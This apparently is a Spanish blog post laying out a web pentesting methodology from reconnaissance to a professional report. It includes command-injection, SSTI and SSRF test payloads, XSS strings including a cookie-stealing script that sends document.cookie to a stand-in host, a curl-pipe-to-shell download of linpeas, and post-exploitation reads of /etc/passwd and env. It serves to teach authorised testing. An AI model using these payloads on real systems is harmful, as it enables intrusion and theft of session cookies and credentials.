Metodología de Pentesting Web: De 0 a reporte profesional

604 palabras

3 minutos

Metodología de Pentesting Web: De 0 a reporte profesional

2025-03-10

Pentesting / Red Team

Pentesting

/

Web

/

Metodología

/

Red Team

/

OWASP

Fases de un Pentest Web#

Un pentesting profesional sigue una estructura clara. No es simplemente “lanzar herramientas” — es un proceso metódico.

1
1. Reconocimiento
2
2. Escaneo y Enumeración
3
3. Identificación de Vulnerabilidades
4
4. Explotación
5
5. Post-Explotación
6
6. Reporte

Fase 1: Reconocimiento#

Reconocimiento pasivo (sin tocar el objetivo)#

1
# WHOIS
2
whois target.com
3

4
# Registros DNS
5
dig target.com ANY
6
dig target.com MX
7
dig target.com TXT
8

9
# Certificados SSL (revelan subdominios)
10
curl -s "https://crt.sh/?q=%.target.com&output=json" | \
11
  jq -r '.[].name_value' | sort -u
12

13
# Google Dorks
14
site:target.com filetype:pdf
15
site:target.com inurl:admin
16
site:target.com "contraseña" OR "password"
17

18
# Wayback Machine
19
waybackurls target.com | tee wayback.txt

Reconocimiento activo#

1
# Descubrimiento de subdominios
2
subfinder -d target.com -o subs_subfinder.txt
3
amass enum -d target.com -o subs_amass.txt
4
cat subs_*.txt | sort -u > all_subs.txt
5

6
# Verificar cuáles están activos
7
httpx -l all_subs.txt -title -status-code -o activos.txt

Fase 2: Enumeración#

1
# Tecnologías
2
whatweb https://target.com
3
wappalyzer (extensión de navegador)
4

5
# Directorios y archivos
6
ffuf -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt \
7
     -u https://target.com/FUZZ \
8
     -fc 404 \
9
     -o dirs.json -of json
10

11
# Parámetros GET
12
arjun -u https://target.com/search
13

14
# Extracción de URLs de JS
15
gau --mc 200 target.com | tee all_urls.txt
16
cat all_urls.txt | grep "\.js$" | sort -u > js_files.txt

Fase 3: Vulnerabilidades comunes#

Injections#

1
# SQL Injection
2
sqlmap -u "https://target.com/user?id=1" --dbs --batch --random-agent
3

4
# Command Injection (testear manualmente)
5
; id
6
| whoami
7
`id`
8
$(id)
9

10
# Template Injection (SSTI)
11
{{7*7}}       # Jinja2, Twig
12
${7*7}        # Freemarker
13
<%= 7*7 %>    # ERB

XSS#

1
# Payloads básicos
2
<script>alert(1)</script>
3
<img src=x onerror=alert(1)>
4
"><script>alert(document.cookie)</script>
5
javascript:alert(1)
6

7
# XSS Avanzado - robo de cookies
8
<script>
9
  fetch('https://tu-servidor.com/steal?c='+document.cookie)
10
</script>

IDOR (Insecure Direct Object Reference)#

1
# Cambiar IDs de usuario en requests
2
GET /api/user/profile/123  →  cambiar a /api/user/profile/124
3
POST /delete-account {"user_id": 123}  →  cambiar a 124
4

5
# Herramienta: Autorize (plugin de Burp Suite)

SSRF#

1
# Payloads de prueba
2
http://127.0.0.1/admin
3
http://169.254.169.254/latest/meta-data/  # AWS metadata
4
http://localhost:8080
5
http://[::1]/admin  # IPv6 bypass
6

7
# Detectar con Burp Collaborator o interactsh
8
python3 -m interactsh-client

Fase 4: Explotación#

Documenta todo mientras explotas. Screenshots, videos, comandos exactos.

1
# Capturar tráfico con Burp
2
# 1. Configurar proxy en Burp (127.0.0.1:8080)
3
# 2. Activar intercept
4
# 3. Realizar la acción vulnerable
5
# 4. Guardar la request
6

7
# Guardar requests importantes
8
burp → request → save item → exploits/vuln_name.req

Fase 5: Post-Explotación#

Si lograste RCE o acceso al servidor:

1
# Información del sistema
2
id && whoami
3
uname -a
4
cat /etc/passwd
5
env
6

7
# Red interna
8
ip addr
9
netstat -tulpn
10
cat /etc/hosts
11

12
# Escalada de privilegios — LinPEAS
13
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Fase 6: El Reporte#

Esta es la fase más importante para clientes reales. Un mal reporte arruina un buen pentest.

Estructura del reporte ejecutivo#

1
1. Resumen Ejecutivo
2
   - Objetivo del pentest
3
   - Periodo de evaluación
4
   - Hallazgos críticos resumidos
5
   - Recomendaciones prioritarias
6

7
2. Metodología utilizada
8

9
3. Hallazgos detallados (por vulnerabilidad):
10
   - Descripción
11
   - Severidad (CVSS score)
12
   - Pasos para reproducir
13
   - Evidencia (screenshots)
14
   - Impacto en el negocio
15
   - Recomendación de remediación
16

17
4. Conclusión

Calculadora CVSS rápida#

1
Crítico: 9.0 – 10.0  (RCE sin auth, SQLi con datos sensibles)
2
Alto:    7.0 – 8.9   (Auth bypass, IDOR masivo, SSRF interno)
3
Medio:   4.0 – 6.9   (XSS almacenado, CSRF, Info disclosure)
4
Bajo:    0.1 – 3.9   (XSS reflejado, Missing headers)

Checklist de pentesting web#

1
[ ] Reconocimiento pasivo completo
2
[ ] Subdominios enumerados
3
[ ] Tecnologías identificadas
4
[ ] Directorios y endpoints mapeados
5
[ ] Autenticación probada (fuerza bruta, bypass)
6
[ ] Todas las inputs probadas para SQLi
7
[ ] XSS en inputs y headers
8
[ ] IDOR en todos los endpoints con IDs
9
[ ] SSRF en campos URL/redirect
10
[ ] Business logic analizada
11
[ ] APIs documentadas y probadas
12
[ ] Headers de seguridad verificados
13
[ ] Evidencia documentada
14
[ ] Reporte redactado

La metodología es la diferencia entre un hacker y un pentester profesional. La práctica constante en HTB, TryHackMe y PortSwigger Academy es el camino. 🔴

Seguiremos con técnicas específicas de cada vulnerabilidad en próximos posts.